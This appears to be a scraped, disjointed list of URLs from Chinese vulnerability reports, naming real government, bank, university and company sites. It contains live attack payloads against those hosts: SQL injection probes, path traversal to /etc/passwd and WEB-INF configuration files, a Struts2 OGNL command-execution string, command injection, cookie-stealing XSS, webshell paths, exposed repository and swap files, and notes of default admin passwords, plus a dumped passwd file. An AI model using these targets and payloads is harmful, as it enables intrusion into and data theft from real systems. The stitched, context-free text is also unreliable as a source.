http://bbs.laifeng.com/uc_server http://www.tuniu.com/ http://home.focus.cn/group/others/tag/group_tag_list.php http://58.211.243.125:8080 http://sdgs.shenhuagroup.com.cn/manage/fckeditor/editor/filemanager/connectors/test.html# http://www.thenorthface.com.cn/user/712270 http://www.hljjjjc.gov.cn/news.php?cid=132 http://www.hljjjjc.gov.cn/shownews.php?id=24398&cid=34 http://www.hljjjjc.gov.cn/?cid=2&pid=132&page=1 http://talk.zj.com/search.cgi?zhuanzai=0&fankui_tag=0 http://www.cbw365.com/index.php/Admin/Index http://bsfw.hebds.gov.cn/wbcms/ http://219.148.59.40:81/wbcms/ http://219.148.59.40:81/wbcms/js/fckeditor/editor/dialog/fck_image.html http://comment.xcar.com.cn http://www.oa8000.com/solution.htm http://demo.oa8000.com http://219.142.40.233:443/Conf/jsp/user/loginAction.do http://www.mogoroom.com/room/roomList.shtml site:bigsun.com.cn filetype:bak https://www.bigsun.com.cn/zxjt/zqzl/qzzl/lcjsp/SQLInclude_Info.jsp https://www.bigsun.com.cn/zxjt/cjzx/detail/public/many_list.jsp?parendId=0002000400060001 https://www.bigsun.com.cn/zxjt/cjzx/detail/public/many_list.jsp?parendId=0002000400060001%27 https://www.bigsun.com.cn/zxjt/cjzx/detail/public/many_list.jsp?parendId=0002000400060001%27 http://119.147.193.173/php/task.php http://119.147.193.173/php/task.php?url=http://localhost;ps%20aux;&cmd=id&time_index=1&email= www.piaowuwang.cn/venue-intro.aspx?id=26 http://www.pxto.com.cn/User/reg_info.asp http://demo.yxcms.net http://sms.xcar.com.cn/phpmyadmin/ http://sms.xcar.com.cn/upload/upload.php http://www.wooyun.org/corps/phpcms http://thinkbbs.lenovo.com.cn/.svn/entries http://shangou.lenovo.com.cn/yypic/ns-v1000-h1.jpg/.php http://qidian.gongfubb.com/ http://account2.gongfubb.com/home/user_service_utf8.php?do=get_userinfo http://tyb.just.edu.cn/ http://tyb.just.edu.cn/nzcms_nzweb/nzcms_up/data/beifeng/asp.asp http://www.jxzbtb.gov.cn/jxcms/front/search/go.action http://**.**.**/zport/dmd/qs-step1submitted= www.aisida.cn http://www.km-17.com/product/cplist.php?zmlei=15 http://www.gw-17.com/product/cplist.php?keyword=PH%BC%C6 http://www.yksanxing.com/cplist.php?sid=74 http://www.dbxinlong.com/cplist.php?SortID=6 http://www.txj-instrument.com/case/cplist.php?id=56 http://www.ykyyqh.com/qh/cplist.php?sid=13 http://www.dsqzjmz.com/cplist.php?sid=23 http://www.nhtequipment.com/cn/cplist.php?sid=19 http://www.mx-17.com/product/cplist.php?zmlei=16&smlei=336&omlei=394 http://www.yyzic.cn/product/cplist.php?zmlei=15&smlei=173&omlei=1380 http://www.cy-17.com/product/cplist.php?zmlei=15&smlei=166 http://www.gk-17.com/product/cplist.php?zmlei=22 http://www.tchld17.com/product/cplist.php?zmlei=16&smlei=333 http://jinfen-17.com/product/cplist.php?zmlei=23 http://www.17-17.cn/product/cplist.php?zmlei=15&smlei=169&omlei=272 http://www.xlhuangniu.com/cplist.php?SortID=19 http://www.jre-17.com/product/cplist.php?keyword=%D5%F1%B5%B4%C6%F7 http://www.shenhuagroup.com.cn/cs/Satellite?c=sh_news_p&cid=1382685035004&pagename=shenhua%2Fsh_news_p%2Fsh_layout%2FgoShenhua%2FpictureLayout&ccid=1385712590227 http://117.135.151.12:7007/ http://xinghuo.yixin.com/index.shtml http://drops.wooyun.org/papers/4611 http://bbs.oppo.cn/ http://bbs.oppo.cn/misc.php?mod=imgcropper http://www.xplus.com/quanpingchuban_anlidaquan.html http://v.jxsb.cn/ http://my.xcar.com.cn/set/task_novice.php http://mlife.cmbchina.com/PlutoPushProxy/queryMessageFromClient.json?_ver=4.2.0&_requuid=EC92A073-39E9-0467-4C2D-59479A237C88&_pla=cmblife_iphone_4.2.0_&_pro=0&_appId=202cb962ac59075b964b07152d234b70&_r=YES&_iv=24&_accountId=1233e1af18894e0b3e0a79c37771b5ee&_uid=202cb962ac59075b964b07152d234b70&DeviceID=202cb962ac59075b964b07152d234b70&appId=202cb962ac59075b964b07152d234b70&_ss=888*888&_mt=iphone100 http://www.smartcome.com/forum.php?mod=viewthread&tid=1%20union%20select%201%20from/*123*/dual--%201 http://fudanwang.com/user/repassword?email=14xxxx2@qq.com&username=wooyuners http://fudanwang.com/user/repassword?email=5xxxxxx3@qq.com&username=admin http://fudanwang.com/user/repassword?email=14xxxx2@qq.com&username=wooyuners http://lenovobbs.lenovo.com.cn/.svn/entries http://redmine.camera360.com/config/database.yml http://www.scal.com.cn/invite2011/admin/ http://www.scppa.gov.cn/search/index.jsp?keyword=2014&clom=doctitle http://www.hisome.com/hisome/Product/Product.html http://202.110.209.186/html/login.html http://218.201.243.175:90/html/login.html http://218.26.1.11/html/login.html http://101.71.242.134/html/login.html http://101.71.242.67/html/login.html www.fruitday.com http://plus.demo.lebi.cn http://api.open.baidu.com/pae/common/page/marriage https://github.com/xiaowaizhuanshu/rchlw/blob/4214206b190684d1497ecc0741a805432b03b10f/src/main/java/com/ruyicai/util/UtilEmail.java http://www.ywetone.com/ http://ehome.ywetone.com/LoginLingjl.aspx http://222.26.127.247/admin/test.php http://222.26.127.247/news/readnews.php?id=685 http://nc.hbny.com.cn:9090/hrss/pub/UploadAttach.jsp?appName=PSNBASDOC_RM&pkAttach=0001V11000000001NLAX http://www.xtst.gov.cn/ImgList.aspx?m=20130711133536357933 http://bbs.meishi.qq.com/ site:zt.ftuan.com url:http://zt.ftuan.com/install/AccountWebService.asmx?op=AddAccount zt.ftuan.com/Plugins/2.aspx http://localhost/KPPW/index.php?do=user&view=message&op=send http://localhost/KPPW/index.php?do=pubtask&id=1&step=step2 http://localhost/KPPW/admin/index.php?do=user&view=list&op=del&edituid=5529 http://localhost/KPPW/admin/index.php?do=user&view=add&edituid= http://bbs.kdxy.wanmei.com:80/config/.config_ucenter.php.swp http://bbs.rwpd.wanmei.com:80/config/.config_ucenter.php.swp http://bbs.kdxy.wanmei.com:80/config/.config_ucenter.php.swp http://a.xcar.com.cn http://a.xcar.com.cn/bbs/usercenter.php?zoneclick=101232这个链接点击刷新并且抓包 http://etrust.ecitic.com/citictrust/userLogin.do http://www.travel.citic.com/route_detail.jsp?routeid=201401231552 http://www.fsit.net/ http://www.fskwjzyy.com/mainnews/WebEditor/db/ewebeditor.mdb http://fsgqt.org.cn/mainnews/WebEditor/db/ewebeditor.mdb http://www.fsmzxx.cn/mainnews/WebEditor/db/ewebeditor.mdb http://www.lnfsjb.gov.cn/mainnews/WebEditor/db/ewebeditor.mdb http://www.xltk.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.fsyczx.cn/mainnews/WebEditor/db/ewebeditor.mdb http://www.fsfly.org/mainnews/WebEditor/db/ewebeditor.mdb http://www.fssszylglzx.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.lnshjk.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.fsxgz.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.yeyany.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.fsjshy.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.baodianfaye.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.yanyanyy.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.lnyuanda.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.fsxf.gov.cn/mainnews/WebEditor/db/ewebeditor.mdb http://www.xxxxx.com/mainnews/WebEditor/admin_login.asp这里登录 http://coating.hc360.com http://coating.hc360.com http://bbs.arcgames.cn/config/.config_ucenter.php.swp http://bbs.arcgames.cn/config/.config_global.php.swp http://gps.sztb.gov.cn http://61.144.253.234:61081 http://work.ylshenhua.com/login.asp COde:data http://bbs.chexun.com/shop_info.php?info=55 http://interface2.i.178.com/~subscribe.index.index/type/1/uid/18422277/ch/D http://interface2.i.178.com/~subscribe.index.index/type/1/uid/18422277/ch/D'+and+'1'='1 http://interface2.i.178.com/~subscribe.index.index/type/1/uid/18422277/ch/D'+and+'1'='2 http://item.tourzj.gov.cn/Leader/eHome/login.aspx http://item.tourzj.gov.cn/ygzw/GG.aspx?id=1356 http://post.blog.hexun.com/login.aspx,发现这个界面是没有验证码的(前台没有后台肯定也没有额) http://www.96877.sh.cn/ http://jjpt.ylshenhua.com/news.asp?ID=183 http://jjpt.ylshenhua.com/Data/ http://wooyun.org/bugs/wooyun-2010-091946 http://pay.100bt.com/login.action https://tender.wanda.cn/file!download.en?id=7663506 http://www.sdwr.gov.cn/sdsl/loginJjxx.jsp http://my.fangdd.com/member/order/detail?orderId=922 http://my.fangdd.com/member/order/detail?orderId=911 http://shop.kouclo.com/trade/order_detail/2015011920000013327 https://ebank.spdb.com.cn/per/main http://202.108.13.148/ encap:Ethernet F3:FC:E6:67:DC addr:192.168.8.17 Bcast:192.168.8.255 Mask:255.255.255.0 fcff:fee6:67dc/64 Scope:Link MTU:1500 packets:7037072758 packets:6895316171 txqueuelen:1000 http://sys.zafu.edu.cn/dy/model/fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=http://sys.zafu.edu.cn/dy/model/fckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx http://bbs.chexun.com/shop_list.php?mod=cat&catid=32 https://m.baidu.com/from=2001a/pu=sz%401320_480/s?word=%22%3B%7D%3Balert%281%29%2F%2Fxss%E4%BB%A3++%22%3B%7D%3Balert%281%29%2F%2F%22%3B%7D%3Balert%281%29%2F%2F%22%3B%2F%2F%2F%2F&sa=tb&ts=2183715&t_kt=38 http://www.sanyuki.com/仙芝官网 http://www.pgywxy.com/ http://60.12.117.118/compinfoaction!tozcCompinfo.action?codeno=59b62944-8e0a-4fe0-9ddd-20d4e63e2526、 http://**.**.**/ http://mzxy.hebtu.edu.cn/phpcms/upload.php http://202.127.48.146/login.jsp http://www.hzrc.com/cy/SignViewAttach2014.aspx?id= http://121.196.43.143/ http://master1.zabbix.shopex.cn https://zyzfcg.ggj.gov.cn/.svn/entries https://zyzfcg.ggj.gov.cn/.svn/text-base/.htaccess.svn-base http://www.gz.10086.cn/service/attach?action=download&file_path=/WEB-INF/web.xml&file_name=web.xml&mode=open http://218.78.217.76/ http://www.gdsto.com.cn/ http://www.gdsto.com.cn/NewsShow.asp?id=89 http://www.comingchina.com/html/downloads/ http://www.comingchina.com/html/case/ http://106.38.248.115:8080/ http://111.206.111.189/xampp/ http://www.gzgczj.com/Manage_System/Default.aspx http://www.whschgm.com http://venus.suning.com/manage/syslogin.aspx?result=4 http://zhuanti.ahedu.gov.cn/fwytj/show.asp?id=10 http://www.mscbsc.com/askpro/question.php?qid=69339 http://www.mscbsc.com/askpro/question.php?qid=69339 http://125.46.74.42:7001/rtp/login!loginUI.action?code=20 http://**.**.**/khyy/login.asp http://sh.12321.cn/x_y.asp?id_nes=4508 http://www.sdxjpc.com/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm www.itpub.net/data.zip http://www.8ycn.com/ http://www.bzxmqc.com/news_detail.php?keyno=37 http://bys.bzrc.cn/news_detail.php?keyno=840 http://www.yuxigroup.com/news_detail.php?keyno=56 http://www.bdsl.cn/news_detail.php?keyno=45 http://www.kfqshxx.com/news_detail.php?keyno=123 http://huoguoyu.com/news_detail.php?keyno=17 http://www.zonyo.net/news_detail.php?keyno=135 http://www.tianjianchina.com/news_detail.php?keyno=16 http://www.bzhxdl.com/news_detail.php?keyno=27 http://www.juxinlicai.com/news_detail.php?keyno=250 http://www.sdhuayugt.com/news_detail.php?keyno=10 http://www.xiangchi.com/liangyou/news_detail.php?keyno=25 http://www.zhcszy.cn/news_detail.php?keyno=91 http://www.sdcfcg.com/news_detail.php?keyno=64 http://mangkabz.com.cn/news_detail.php?keyno=548 http://www.sdjnhx.com/news_detail.php?keyno=11 http://www.bzsanli.com/news_detail.php?keyno=6 http://www.qiangtusw.com/news_detail.php?keyno=3 http://www.zpsjjj.com/news_detail.php?keyno=12 http://www.hmbaila.com/news_detail.php?keyno=17 http://www.binzhouanhui.com/news_detail.php?keyno=17 http://www.tzysclp.com/news_detail.php?keyno=16 http://www.bzkfqsyy.com/news_detail.php?keyno=2278 http://www.topys.cn/article/detail?id=16257 http://www.topys.cn/api/member/detail?&_r=0.2300950309582218这个方法就可以查看到该人的详细信息 http://www.bdnmg.com:8080/gps/login http://www.2081234.cn http://www.lynu.cn/xinwen/tongzhi.php?typeid=5 http://www.lynu.cn/xinwen/whatsnew.php?typeid=4 http://www.lynu.cn/xinwen/whatsnew1.php?typeid=4 http://yida.taoche.com/left.aspx http://scm.tmt.tcl.com/ http://116.228.171.38/,admin密码123456,登录后访问http://116.228.171.38/admin/,可对系统进行操作,证明: http://123.125.120.224 WWW.ChinaCache.com/template.rar http://zhengwen.dxzq.net/ http://zhengwen.dxzq.net/article?id=918 http://www.747.cn/.git/config http://www.747.cn/index.php?a=orderDetails&m=Memberpc&orderid=jd_4068726190 http://www.747.cn/admin.php http://www.decai.wang/123.rar http://www.scrc365.com/wwwroot.rar www.scrc365.com http://www.xuzhou114.net/wwwroot.rar http://www.hcrcw.net/hcrcw.rar mail.eco.gov.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 mail.nxca.gov.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 mail.polus.edu.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 kali:/share/exploit/cms/zimbra# https://eco.gov.cn:7071/zimbraAdmin/ http://wordpress.7po.com/ http://xmgl.cstc.gov.cn/kwxmgl/jsp/nosession/download.jsp?filename=download.jsp http://xmgl.cstc.gov.cn/kwxmgl/jsp/nosession/download.jsp http://www.jlsi.gov.cn/wwwroot/jlsi/main.jspx http://www.jlsi.gov.cn:8080/otp/login.jsp?message=&loginAccount= http://gc.cscec8b.com.cn/ http://www.hnahotelsandresorts.com http://www.hnahotelsandresorts.com/ajax/AjaxHandler.ashx http://www.cmscforum.com/activity/admin/login存在弱口令 http://**.**.**/scetb2b/b2b/orderquery/pnrdisplay.jsppnrno= http://**.**.**/scetb2b/b2b/orderquery/pnrdisplay.jsppnrno=NGSR2B http://elearning.100e.com/lvword/AddToMyLib.asp?LetterLevel=0&PageNo=6&WordLevel= http://elearning.100e.com/ http://218.83.241.245/shell.asp http://www.wayboo.cn/ xxxx.com/control/login.php http://www.xayichi.com/subweb_list.php?class=37 http://www.xakqby.com/subweb_list.php?class=37 http://www.sjzbangongjiaju.com/subweb_list.php?class=37 http://www.pbdt360.com/subweb_list.php?class=37 http://www.zzpjjg.com/subweb_list.php?class=44 http://www.jndsmm.com/subweb_list.php?class=37 http://www.xyxf119.com/subweb_list.php?class=37 http://qcsiwang.com/subweb_list.php?class=37 http://hrgg88.com/subweb_list.php?class=63 http://tianchuanfood.com/subweb_list.php?class=37 http://chengkai888.com/subweb_list.php?class=37 http://www.lhzpl.com/subweb_list.php?class=37 http://www.hbdxps.com/subweb_list.php?class=37 http://www.hszs555.com/subweb_list.php?class=37 http://www.chengtiannuanqi.com/subweb_list.php?class=37 http://chengxinbaipisong.com/subweb_list.php?class=37 http://www.caciquemill.net/subweb_list.php?class=37 http://www.qiuzhenwushi.com/subweb_list.php?class=73 http://www.huashidaijiaoyu.com/subweb_list.php?class=37 http://bdjunlong.com/subweb_list.php?class=37 http://www.bszyjc.net/subweb_list.php?class=37 http://www.bszyjc.net/subweb_list.php?class=37 http://bdjunlong.com/subweb_list.php?class=37 http://plus.demo.lebi.cn/——可注册普通用户和商家用户 http://demo.lebi.cn/——可注册普通用户 http://plus.demo.lebi.cn/进行测试 http://plus.demo.lebi.cn/supplier/即可登陆商家页面 http://shop.lutoog.com/ http://www.wanxinsoft.com/ http://222.204.208.4/site/model/twogradepage/playtv.aspx?id=1396 http://59.69.101.10/model/TwoGradePage/playtv.aspx?id=1396 http://121.192.178.138/model/TwoGradePage/playtv.aspx?id=1396 http://202.206.48.106/model/TwoGradePage/playtv.aspx?id=1396 http://dxsb.qfnu.edu.cn//model/TwoGradePage/playtv.aspx?id=1396 http://peclub.ecnu.edu.cn//model/TwoGradePage/playtv.aspx?id=1396 http://engtc.sjtu.edu.cn///model/TwoGradePage/playtv.aspx?id=1396 http://dxsb.qfnu.edu.cn//model/TwoGradePage/playtv.aspx?id=1396 http://engtc.sjtu.edu.cn///model/TwoGradePage/playtv.aspx?id=1396 http://jd.517na.com) http://jd.517na.com/HotelOrder/OrderQuery?txtOrderKeyId=&txtStartDate=2014-12-21&txtEndDate=2015-01-21&txtGuestName=&ddlOrderFlag=1&ddlOrderStatus=0&txtBuyerStatffId= http://fw.rrs.com http://fw.rrs.com/snaplb/anonymous/topic/portal/b44176ee-001e-41f0-9af9-3af8bd7fe1a2?topicTypeId= http://222.204.208.4/Site/model/TwoGradePage/down.aspx?columnId=76&pid=42&clname=%E5%AE%9E%E9%AA%8C%E5%A4%A7%E7%BA%B2%E4%B8%8B%E8%BD%BD http://59.69.101.10/model/TwoGradePage/down.aspx?columnId=98&pid=64&clname=%E4%B8%8B%E8%BD%BD%E4%B8%AD%E5%BF%83 http://121.192.178.138/model/TwoGradePage/down.aspx?columnId=120&pid=98&clname=%E4%B8%8B%E8%BD%BD%E4%B8%AD%E5%BF%83 http://peclub.ecnu.edu.cn/model/TwoGradePage/down.aspx?columnId=76&pid=42&clname=%E5%AE%9E%E9%AA%8C%E5%A4%A7%E7%BA%B2%E4%B8%8B%E8%BD%BD http://labch.cumt.edu.cn:81/model/TwoGradePage/down.aspx?columnId=60&pid=42&clname=%E5%AE%9E%E9%AA%8C%E5%A4%A7%E7%BA%B2%E4%B8%8B%E8%BD%BD http://engtc.sjtu.edu.cn/model/TwoGradePage/down.aspx?columnId=60&pid=42&clname=%E5%AE%9E%E9%AA%8C%E5%A4%A7%E7%BA%B2%E4%B8%8B%E8%BD%BD http://dxsb.qfnu.edu.cn//model/TwoGradePage/down.aspx?columnId=60&pid=42&clname=%E5%AE%9E%E9%AA%8C%E5%A4%A7%E7%BA%B2%E4%B8%8B%E8%BD%BD http://www.crmhc.com/index.jsp http://www.crmhc.com/department/department.jsp?department_id=2 http://www.vans-china.cn/report/zrkcsplbcxlb.jsp http://zwzx.xmmsa.gov.cn:83/#A01 http://zwzx.xmmsa.gov.cn:83/NoticesDetail.aspx?nId=1196 https://vpn.sohu-inc.com/+CSCOE+/logon.html http://drops.wooyun.org/papers/3451 http://218.58.70.134/ http://210.77.84.46:81/ http://180.168.192.42:8080/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27id%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://i.zhaopin.com/Login/LoginManager/Login http://cm.qcloud.com http://cm.qcloud.com/detail2/embed.php?type=cdb&val=************ http://e.fangdd.com/ http://mpcms.youku.com/ http://cloud.qq.com http://www.qcloud.com http://cm.qcloud.com http://sms.china-sss.com/newAnonymousComplaint.json# http://218.58.70.201/haier/sys/Login_dologin.action http://www.shejiben.com/mobileapp/my/info.php?uid=1300817 http://www.shejiben.com//mobileapp/my/index.php?uid=1 http://202.102.221.14:8011/portal/电信后台 http://202.102.221.14:8011/portal/changePassword.jsp?empeeAcct= http://202.102.221.14:8011/OdmWeb/queryOrder/YdqPrintCg?orderIds=104272434&latnId=550&type=1&flag=1&custOrderId=59272919 http://sms.china-sss.com/downloadFile.json?tuId=110333&random=0.001489174086600542 http://sms.china-sss.com/downloadFile.json?tuId=110331&random=0.001489174086600542 http://www.cmscforum.com/cmsgift/admin/login POST:http://cm.qcloud.com/catv2/request.ajax.php cmd:simpleVerifyTask http://manage.qcloud.com/ g_tk:1298727730 http://cm.qcloud.com/catv2/request.ajax.php http://180.153.27.5/ http://mail.shmetro.com http://sdgs.shenhuagroup.com.cn http://219.222.191.152:8080/recruit/servlet/newsManage?id=33 http://113.140.66.226:8080/12369/login.do http://wooyun.org http://wooyun.org http://wooyun.org/ http://wooyun.org http://wooyun.org http://wooyun.org/ http://zybj.jnu.edu.cn/user/reg.asp http://zybj.jnu.edu.cn/admin/login.asp http://zybj.jnu.edu.cn/upfiles/20150121/20150121163113081308.asp http://124.17.5.226/index.do https://portal.haier.com/haierCms/zxzx/gllc/index.shtml http://119.254.67.196/ http://image.post.tom.com/style/commom%5Cxing.php http://www.comingchina.com/html/downloads/ http://www.comingchina.com/html/case/ http://pan.baidu.com/s/1nQRzo https://github.com/nathanyhm/langlearning/blob/83dc5290c242a37ec609234b7caecd028a448ec7/pythonlearning/ipmonitor_aio.py http://b.taoshij.com/ http://www.qq.com/coral/coralindex/indexCoral_new.htm http://ent.qq.com/a/20150121/005159.htm http://web1.sjvpn.net:7000/webadmin/useradmin/user_self_new.php http://sys.linghangyun.com/sysadmin/useradmin/user_self_new.php http://bbs.168tuiguang.com:8000/vpnadmin/useradmin/user_self_new.php http://user.huanqiuip.com/user_self_new.php http://ffuser.syssuper.com/user_self_new.php http://seouser.syssuper.com/user_self_new.php http://sys.green520.com:8000/vpnadmin/useradmin/user_self_new.php http://vip.18ht.net:8000/webadmin/useradmin/user_self_new.php http://jj.syssuper.com/useradmin/user_self_new.php http://lmuser.syssuper.com/user_self_new.php http://sys.168hdkfc.com:8000/vpnadmin/useradmin/user_self_new.php http://miyunuser.syssuper.com/user_self_new.php http://client.168hdkfc.com:8000/vpnadmin/useradmin/user_self_new.php http://wooyun.org/bugs/wooyun-2010-078082 http://wooyun.org/bugs/wooyun-2010-074371 http://kfdc.cdpf.org.cn/ filetype:xlsx http://cgy.name:90/vaio_bak/rsun/resources/弘阳网站管理参数.xlsx http://www.redsun.com.cn/manager/ https://61.144.235.34/ http://www.ybxfj.gov.cn/Y01/ws_xw/index.asp?mkbh=M005001 http://www.ybxfj.gov.cn/Y01/ws_xw/index.asp?mkbh=M005001 http://sqlmap.org http://intl.wisco.com.cn http://intl.wisco.com.cn/cms/app存在目录遍历漏洞,可查看app目录所有文件咯···· http://intl.wisco.com.cn/cms/app/permission/userPreivileges-old.jsp https://github.com/PTS-CD/3six5/blob/abcd052570d0d143c52f5606ebf28afdacb89631/src/main/resources/net/tangs/three6five/system.properties http://60.191.42.42/sinoiabd/checklogin/pubUserPosts.do http://www.jit.com.cn/ http://zwgk.wangqing.gov.cn/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200809231048070703&department_name=乡镇(街道)政府&department_Type=0&isFirstShow= http://218.62.90.168/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200809231048070703&department_name=乡镇(街道)政府&department_Type=0&isFirstShow= http://61.138.128.150:8080/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200804031221290453&department_name=政府直属事业单位&department_Type=0&isFirstShow= http://222.34.78.21/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200804031138500843&department_name=白城市人民政府&department_Type=0&isFirstShow=是 http://218.62.67.213/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200804031221280718&department_name=政府工作部门&department_Type=0&isFirstShow= http://222.160.175.90/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200809231048070671&department_name=政府部门和具有管理公共事务职能的组织&department_Type=0&isFirstShow= http://www.ilj.gov.cn/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200804031221280718&department_name=政府工作部门&department_Type=0&isFirstShow= http://222.162.179.83/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200804031221280718&department_name=政府工作部门&department_Type=0&isFirstShow= http://xxgk.yanji.gov.cn/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200804031221290453&department_name=各乡镇、街道&department_Type=0&isFirstShow= http://www.hzda.gov.cn/web/WebDisk/FileList.aspx?id=123 http://www.studyez.com/leaveword/default.aspx http://www.studyez.com:80/leaveWord/Default.aspx www.studyez.com http://223.82.244.92/eshow/ http://www.lagtj.gov.cn/ http://www.lagtj.gov.cn/%c0%ae/WEB-INF/web.xml http://www.lagtj.gov.cn/%c0%ae//WEB-INF/config/application-context.xml http://www.lagtj.gov.cn/%c0%ae//WEB-INF/config/jdbc.properties http://webscan.360.cn/ http://help.53kf.com/ http://www.ejiayu.com/web_adm/admin_index.php。 http://custom.ccb-life.com.cn:9080/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\passwd http://icc.21cp.com/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\passwd http://111.75.198.122/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\passwd http://im.e-picc.com.cn/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\passwd http://icc.occard.com.cn/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\passwd http://officemsg.focus.cn/group/photo_search.php?group_id=81634&search_str=sohu&search_type=author&search_area=81634&submit=%CB%D1%CB%F7%CD%BC%C6%AC http://officemsg.focus.cn/group/photo_search.php?group_id=81634&search_str=sohu&search_type=author&search_area=81634%27%20and%201=1--+&submit=%CB%D1%CB%F7%CD%BC%C6%AC http://officemsg.focus.cn/group/photo_search.php?group_id=81634&search_str=sohu&search_type=author&search_area=81634%27%20and%201=0--+&submit=%CB%D1%CB%F7%CD%BC%C6%AC http://creditcard.bankcomm.com/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false games:x:12:100:Games account:/var/games:/bin/bash wwwrun:x:30:8:WWW apache:/var/lib/wwwrun:/bin/false ftp:x:40:49:FTP account:/srv/ftp:/bin/bash nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash D-Bus:/var/run/dbus:/bin/false haldaemon:/var/run/hald:/bin/false daemon:/var/lib/sshd:/bin/false man:x:13:62:Manual viewer:/var/cache/man:/bin/bash news:x:9:13:News system:/etc/news:/bin/bash uucp:x:10:14:Unix-to-Unix system:/etc/uucp:/bin/bash uuidd:x:102:104:User uuidd:/var/run/uuidd:/bin/false puppet:x:103:105:Puppet daemon:/var/lib/puppet:/bin/false at:x:25:25:Batch daemon:/var/spool/atjobs:/bin/bash postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false polkituser:x:104:106:PolicyKit:/var/run/PolicyKit:/bin/false ntp:x:74:107:NTP daemon:/var/lib/ntp:/bin/false pulse:x:105:108:PulseAudio daemon:/var/lib/pulseaudio:/bin/false suse-ncc:x:106:110:Novell User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash gdm:x:107:111:Gnome daemon:/var/lib/gdm:/bin/false transadmin:x:9013:9013::/home/transadmin:/bin/bash login01:x:9001:9001::/home/login01:/bin/bash patrol:x:9009:9009::/home/patrol:/bin/bash splunk:x:9011:9011::/home/splunk:/bin/bash pccc:x:6011:6011::/home/pccc:/bin/bash uficc:x:9014:6001::/opt/uficc:/bin/bash http://www.zjsc.gov.cn/lingshou/servlet/MainServer file:///etc/passwd&Work=getnewsinfo http://love.17173.com/ http://118.112.181.187/wznj/, http://118.112.181.187/console/,用户名和密码都是weblogic,可部署war木马,发现漏洞后,没进一步测试。证明: http://www.ccqtgb.com/download/download.jsp?filename=windows/win.ini&filepath=../../../../../../../../../../../windows/win.ini http://2.taobao.com/ http://www.suopingbao.com/api.php?_ksTS=1421338903592_548&&callback=jsonp459&c=checkcode&mobile=手机号码&sessionid=验证码ID&identity=app.taobao.com&code=验证码&sms_type=1&name=APP名称(自定义短信内容)&id=APP的ID http://try.cosmetics.ifeng.com http://180.*****.214/Alarm/Admin http://www.yjkang.cn/home_home.action http://www.yjkang.cn/home_downMmanual.action?manualFileName=../../WEB-INF/web.xml http://zyyd.media.open.com.cn/picexam/wszypic.asp?a_id=000203&c_depth=1&c_id=bl&p_type=%D5%EF%B6%CF%27 http://211.147.239.62/ https://m.baidu.com/from=2001a/pu=sz%401320_480/s?word=%22%2Balert%28document.cookie%29%2B%22%22%2Balert%28document.cookie%29%2B%22&sa=tb&ts=7803325&t_kt=76 http://m.baidu.com/from=2001a/bd_page_type=1/ssid=0/uid=0/pu=sz%401320_480%2Cta%40iphone___3_537%2Cusm%401/baiduid=CE5B17AA9267A14825338E1C480E4430/w=0_10_%22%2Balert%28document.cookie%29%2B%22%22%2Balert%28document.cookie%29%2B%22/t=iphone/l=1/tc?ref=www_iphone&lid=10763659046364824509&order=8&fm=alfy&tj=Wp_8_0_10_title&sec=757&di=981cd263dbcbaf4f&bdenc=1&nsrc=IlPT2AEptyoA_yixCFOxXnANedT62v3IIBOPPCUK1De8mVjte4viZQRAJ7GgNXXTUS4jvCPQpwoDwmGdXTVqj2A4u_-ghzRwniCwubjms1bVVct1ag2hLgDkDXBql0qgyKlMxAgoBxIoB7EvpOX6ew9kfdmDxgx7lBaYg8imqc7QYo3 http://moldsale.haier.com/ http://moldsale.haier.com/bidadmin/bidedit.asp?id=1000 http://120.132.37.228:8000/ 